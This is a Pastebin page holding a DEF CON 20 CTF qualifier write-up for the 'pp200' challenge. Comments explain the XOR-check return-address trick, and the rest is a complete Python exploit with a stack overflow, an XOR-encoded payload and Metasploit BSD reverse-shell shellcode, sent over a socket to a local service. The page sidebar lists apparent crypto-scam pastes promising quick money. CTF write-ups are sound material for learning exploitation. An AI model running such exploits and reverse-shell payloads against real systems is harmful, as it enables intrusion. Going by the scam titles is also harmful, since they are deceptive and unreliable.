| CARVIEW |
Select Language
HTTP/2 200
date: Thu, 09 Oct 2025 06:01:39 GMT
content-type: text/html; charset=UTF-8
server: cloudflare
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
vary: accept-encoding
cf-cache-status: DYNAMIC
content-encoding: gzip
set-cookie: _csrf-frontend=678912c99e8f417b9e0b9a6c58e9e152306b30b256c7fab8fe2d537eaf9a863ea%3A2%3A%7Bi%3A0%3Bs%3A14%3A%22_csrf-frontend%22%3Bi%3A1%3Bs%3A32%3A%227SCibmcgUbolIcIicJHOP7yEGu3dr67R%22%3B%7D; HttpOnly; Path=/
cf-ray: 98bbaa22ba0b1712-BLR
Defcon 20 CTF Quals - PP200 Write up - Pastebin.com
SHARE
TWEET
Defcon 20 CTF Quals - PP200 Write up
a guest
Jun 4th, 2012
2,408
0
Never
Add comment
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- # exploit by @jgrusko
- # You can find a detailed analysis here:
- # https://blog.oxff.net/posts/DefCon%2020%20CTF%20Qualifications%3A%20pp200-jmjgjxh7rng7hgjyd7hq.html
- # I'll just focus my explanation on the way used to avoid relying on a stack address which
- # is not always accurate.
- # As said in the blog post, the verify_user() takes a dword as parameter and stores it at
- # static address 0x0804C58C
- # Then each byte of the dword is XORed against each other and compared to the value 0xa6 as in
- # the following pseudo code:
- # int verify_userid(unsigned int userid)
- # {
- # unsigned char *dword = userid;
- # return ((dword[0] ^ dword[1] ^ dword[2] ^ dword[3]) == 0xa6);
- # }
- # This means that we can use 3 ARBITRARY bytes and use the last one to make the result 0xa6.
- # Since this dword is located at a static location we can use it as our return address.
- # By supplying the following dword 0x29ecc3a0, the verify_userid() function
- # will succeed. When exploiting the stack overflow and returning on 0x0804C58C, we will have
- # the 2 following instructions executed:
- # ==============
- # sub esp, ebp ; 0x29 0xec
- # ret ; 0xc3
- # ==============
- # Since sfp has also been overwritten, ebp now contains an arbitrary value, which in our case
- # is 0x214. After ESP is subtracted by 0x214, it will point at the beginning of the shellcode.
- # The first dword of the shellcode is actually pointing on a "jmp esp" instruction, jumping
- # directly into the shellcode.
- # Even if we supply a dword, the shellcode is actually only XORed with the MSB of this
- # dword.
- # Here's the exploit code:
- import socket, struct
- # metasploit bsd/x86/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444
- # If you are trying this on your system, remember the program
- # performs a chroot() call thus, if /bin/sh is not present
- # inside pp200 home directory you won't get a shell ;)
- shellcode = (
- "\x68\x7f\x00\x00\x01\x68\xff\x02\x11\x5c\x89\xe7\x31\xc0"
- "\x50\x6a\x01\x6a\x02\x6a\x10\xb0\x61\xcd\x80\x57\x50\x50"
- "\x6a\x62\x58\xcd\x80\x50\x6a\x5a\x58\xcd\x80\xff\x4f\xe8"
- "\x79\xf6\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
- "\x50\x54\x53\x50\xb0\x3b\xcd\x80"
- )
- jmpESP = struct.pack("<I", 0x0804b56b)
- retAddr = struct.pack("<I", 0x0804c58c)
- # XOR Encode payload with MSB
- def xor_payload(payload):
- encoded_payload = ""
- for b in payload:
- encoded_payload += chr(ord(b) ^ 0x29)
- return encoded_payload
- def exploit():
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- s.connect(("localhost", 8912))
- # Send password
- s.send("b74b9d86e6cd3480\n")
- print(s.recv(1024))
- # Send userid
- s.send("a0c3ec29\n")
- print(s.recv(1024))
- payload = jmpESP + "\x90" * (0x200 - 4 - len(shellcode)) + shellcode
- payload += "\x0b" + struct.pack("<I", 0x214) + retAddr + "\n"
- s.send(xor_payload(payload) + "\n")
- print(s.recv(1024))
- s.close()
- if __name__ == "__main__":
- exploit()
Advertisement
Add Comment
Please, Sign In to add comment
-
⭐✅ MAKE $2500 IN 15 MIN⭐⭐⭐ F
JavaScript | 4 sec ago | 0.24 KB
-
Free Crypto Method (NEVER SEEN BEFORE)⭐⭐ Y
JavaScript | 6 sec ago | 0.24 KB
-
⭐✅ Exploit 2500$ in 15 Minutes⭐⭐⭐ W
JavaScript | 16 sec ago | 0.24 KB
-
⭐✅ Swapzone Glitch ✅ Working⭐⭐⭐ V
JavaScript | 19 sec ago | 0.24 KB
-
Free Crypto Method (NEVER SEEN BEFORE)⭐⭐ Y
JavaScript | 26 sec ago | 0.24 KB
-
✅ Make $2500 in 20 minutes⭐⭐⭐ 0
JavaScript | 30 sec ago | 0.24 KB
-
⭐✅ Swapzone Glitch ✅ Working⭐⭐⭐ D
JavaScript | 37 sec ago | 0.24 KB
-
⭐⭐Exchange Exploit⭐⭐ 0
JavaScript | 40 sec ago | 0.24 KB
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
